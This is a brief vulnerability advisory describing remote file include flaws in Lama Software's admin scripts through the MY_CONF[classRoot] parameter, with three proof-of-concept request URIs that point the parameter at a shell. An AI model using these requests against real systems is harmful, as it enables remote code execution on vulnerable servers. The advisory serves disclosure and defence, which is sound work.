|
Lama Software 'MY_CONF[classRoot]' Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a browser. The following proof-of-concept URIs are available: http://www.example.com/admin/functions/inc.steps.access_error.php?MY_CONF[classRoot]=Shell http://www.example.com/admin/functions/inc.steps.check_login.php?MY_CONF[classRoot]=Shell http://www.example.com/admin/functions/inc.steps.init_system.php?MY_CONF[classRoot]=Shell |
|
Privacy Statement |